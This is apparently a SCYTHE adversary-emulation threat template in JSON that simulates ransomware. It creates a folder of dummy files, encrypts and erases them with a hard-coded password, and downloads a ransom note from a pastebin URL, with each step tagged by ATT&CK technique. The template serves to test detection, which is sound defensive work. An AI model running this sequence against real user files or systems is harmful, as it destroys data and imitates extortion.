Ransomware_Example_scythe_threat.json

{
    "threat": {
        "category": "User-Defined",
        "description": "This Threat Template provides an example ransomware attack, but instead of using actual user data, it creates a directory with files specifically for the purpose of encrypting them. It then downloads a ransom note from the public internet.",
        "display_name": "Ransomware Example",
        "name": "Ransomware Example",
        "operating_system_name": "windows",
        "script": {
            "0": {
                "conf": "--cp 127.0.0.1:443 --multipart 10240 --secure true",
                "module": "https",
                "type": "initialization"
            },
            "1": {
                "module": "loader",
                "module_to_load": "run",
                "request": "--load run",
                "type": "message"
            },
            "2": {
                "module": "loader",
                "module_to_load": "file",
                "request": "--load file",
                "type": "message"
            },
            "3": {
                "module": "loader",
                "module_to_load": "crypt",
                "request": "--load crypt",
                "type": "message"
            },
            "4": {
                "module": "loader",
                "module_to_load": "downloader",
                "request": "--load downloader",
                "type": "message"
            },
            "5": {
                "time": 10,
                "type": "delay"
            },
            "6": {
                "depends_on": "93b6b9cf-78d2-45ee-a174-08290fdf73db",
                "module": "run",
                "request": "cmd /c mkdir \"%USERPROFILE%\\Desktop\\x_all_the_stolen_files\"",
                "rtags": [
                    "att&ck-technique:T1059"
                ],
                "type": "message"
            },
            "7": {
                "depends_on": "e96eccc9-6c98-4246-b809-1849684c7df2",
                "module": "file",
                "request": "--create --path \"%USERPROFILE%\\Desktop\\x_all_the_stolen_files\\important_file.dat\" --size 10MB --count 5",
                "rtags": [
                    "att&ck-technique:T1078"
                ],
                "type": "message"
            },
            "8": {
                "depends_on": "ff705b65-037a-4f06-b21e-e74e6cfe32bc",
                "module": "crypt",
                "request": "--target \"%USERPROFILE%\\Desktop\\x_all_the_stolen_files\\\" --encrypt --password \"h3ll0w0rld\" --erase --recurse",
                "rtags": [
                    "att&ck-technique:T1486"
                ],
                "type": "message"
            },
            "9": {
                "depends_on": "6f076e51-2e23-46c2-b88e-4505902f960e",
                "module": "downloader",
                "request": "--src \"https://pastebin.com/raw/VXHKw3H2\" --dest \"%USERPROFILE%\\Desktop\\x_all_the_stolen_files\\we_have_stolen_your_files.txt\"",
                "rtags": [
                    "att&ck-technique:T1105"
                ],
                "type": "message"
            },
            "10": {
                "module": "controller",
                "request": "--shutdown",
                "rtags": [
                    "scythe",
                    "att&ck",
                    "att&ck-tactic:TA0011",
                    "att&ck-technique:T1219"
                ],
                "type": "message"
            }
        },
        "signature": "3ce1cbeedb097e1a0c3b83ebdd6c955a7433cf29"
    }
}